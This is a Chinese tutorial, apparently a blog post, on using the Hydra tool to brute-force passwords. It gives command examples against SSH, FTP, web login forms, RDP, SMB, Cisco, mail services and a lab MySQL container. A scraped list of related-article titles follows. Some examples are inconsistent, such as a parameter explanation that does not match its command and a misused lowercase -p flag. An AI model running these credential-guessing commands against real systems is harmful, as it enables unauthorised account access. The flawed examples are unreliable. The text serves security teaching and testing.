需要用到的工具:

Kali (也可以不需要)
hydra (Kali自带,可以自行安装windows版或者其他平台)
密码字典 (自己去github找,关键词“字典”)

本教程仅限技术交流,请勿作他用,本人不对任何使用此技术进行违法犯罪的行为负责!!

1、 简单介绍

1.1、来源及主要功能

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。 官
网:http://www.thc.org/thc-hydra。

可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY,HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy,ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec,Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

1.2、参数说明


hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为16。 -w TIME 设置最大超时的时间,单位秒,默认是30s。 -v / -V 显示详细过程。 server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。 OPT 可选项

2、示例语法

2.1、破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程数 -o save.log -vV ip ssh

2.2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程数(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

2.3、get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns -f ip http-get /admin/index.php

2.4、post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)

2.5、破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

2.6、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

2.7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

2.8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

2.9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

2.10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

2.11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

2.12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

3、实践演示

环境搭建过程:参考:MySQL5.7开启密码登录

3.1、指定用户名爆破MySQL

3.1.1、指定用户名进行爆破

密码字典:写入多个密码(一行一个),其中有一个必须是真实密码,否则爆破失败

爆破命令

hydra -l root -P pass.txt mysql://172.17.0.2

PS:
-l #指定一个用户名(-L 指定用户名字典)
-P #指定一个密码字典文件

然后可以看到,此时密码爆破成功了!

补充: 如果需要知道运行了多久,可以在命令的前面加上一个命令:time

time hydra -l root -P pass.txt mysql://172.17.0.2

黑客之路-使用hydra进行简单的密码爆破相关推荐

  1. 小小黑客之路(一)——端口扫描器

    在之前了解过黑客,曾经在网易上写过一篇关于黑客的文章--<黑客初识>,由于各种原因没有继续学习去,由于前几天的机房讲课,又激起我那不安的心,故找到一本<小小黑客之路>进行学习. ...

  2. 2-路插入排序c语言算法,浅谈2路插入排序算法及其简单实现

    2路插入排序算法是在直接插入排序算法的基础上增加了一个辅助数组,其目的是减少排序过程中的移动次数,需要增加n个记录的辅助空间. 难点可能在于对取余的考虑吧,可以把辅助数组看成一个环状空间,这样就能更好 ...

  3. 简单java登录页面android_Android 之路 - RxJava2+Retrofit实现简单登陆

    原标题:Android 之路 - RxJava2+Retrofit实现简单登陆 前言 使用RxJava2+Retrofit实现简单登陆. 正文1. Hello world1.1 相关版本 Androi ...

  4. 黑客入侵终端设备的5大简单方式

    黑客的攻击方式并非都是复杂繁琐的.当黑客发起网络攻击时仅为了牟利而已,并不是都需要掌握高超的技术.他们的动机大体上可以分为两种:机会主义和针对性攻击. Bishop Fox安全事务负责人Rob Rag ...

  5. 【渗透测试】密码爆破工具——九头蛇(hydra)使用详解及实战

    九头蛇hydra 记得美国队长中的大反派hydra(九头蛇)组织吗? 今天介绍的这款渗透测试工具,也叫这个名字.​ hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大 kali下是默 ...

  6. 《密码爆破漏洞详解》——黑客必修的入门操作( 建议收藏 )

    隔壁老张: "狗剩啊, 隔壁xx村的王姐家的女娃好漂亮, 我想盗她qq啊, 你帮我把" 狗剩: "我不会呀" 村里大妈: "那个狗剩啊, 盗个qq号都 ...

  7. 密码爆破工具——九头蛇(hydra)

    九头蛇hydra 记得美国队长中的大反派hydra(九头蛇)组织吗? 今天介绍的这款渗透测试工具,也叫这个名字.​ hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大 kali下是默 ...

  8. hydra暴力破解ssh密码

    环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool. 下面是官网上的介绍: AFP, Cisco AAA, Cisco auth, Cisco enable, C ...

  9. 搭建图片加密平台,扫码支付后简单获取密码

    搭建图片加密平台,扫码支付后简单获取密码 很多人问我,互联网上到底做什么项目是可以赚到钱的?没有基础,不懂技术,不会推广,所以有没有简单一点的,一操作就能上手就能赚钱的?我可以很肯定的告诉你:没有. ...

最新文章

  1. Redis缓存失效策略思考
  2. swift 组件化_京东商城订单模块基于 Swift 的改造方案与实践
  3. Quartz教程三:Job与JobDetail介绍
  4. LTE中的TB/codeword/layer/precoding/port
  5. MCMC笔记Metropilis-Hastings算法(MH算法)
  6. 数组查找———二分(折半)查找法
  7. 介绍一款受欢迎的.NET 开源UI库
  8. 用java绘制一个光照球体_HTML5 Canvas一个基本光线行进的球体光照效果
  9. 完美实现类似QQ的自拍头像、上传头像功能!(Demo 源码)
  10. visio2013激活软件,绝对靠谱!!!
  11. COMSOL Multiphysics 多物理场仿真学习小记
  12. python 使用GDAL实现栅格tif转矢量shp
  13. Could not locate executable null\bin\winutils.exe in the Hadoop binaries解决方式
  14. 红帽 RHCSA笔记
  15. 房产管理系统平台平台管理分析
  16. 微型计算机联想扬天a6800,商务新选择 联想扬天A6800V评测
  17. 博士生毕业后进高校当老师,直接是副教授吗
  18. android辅助功能手势,Android辅助功能——全局手势放大实现原理
  19. spring-boog-测试打桩-Mockito
  20. 【机器学习】之机器学习方法的分类

热门文章

  1. 7种夏季人像暖色效果LR预设
  2. 屏幕开发-屏幕文本的翻译
  3. 图形学画直线c语言,002计算机图形学之直线画线算法
  4. ssr手机_关于手机系统的安全性
  5. socket通讯工具类
  6. python单片机自动浇花_MicroPython实例之TurnipBit开发板自动浇水实验
  7. 未明学院:不拼爹,我的offer全靠自己network!
  8. 均质机工作原理动画_玉林均质机原理组图
  9. C++string中的find()函数
  10. 最新仿映客直播APP开发实战项目IOS开发实战8天(最全最新)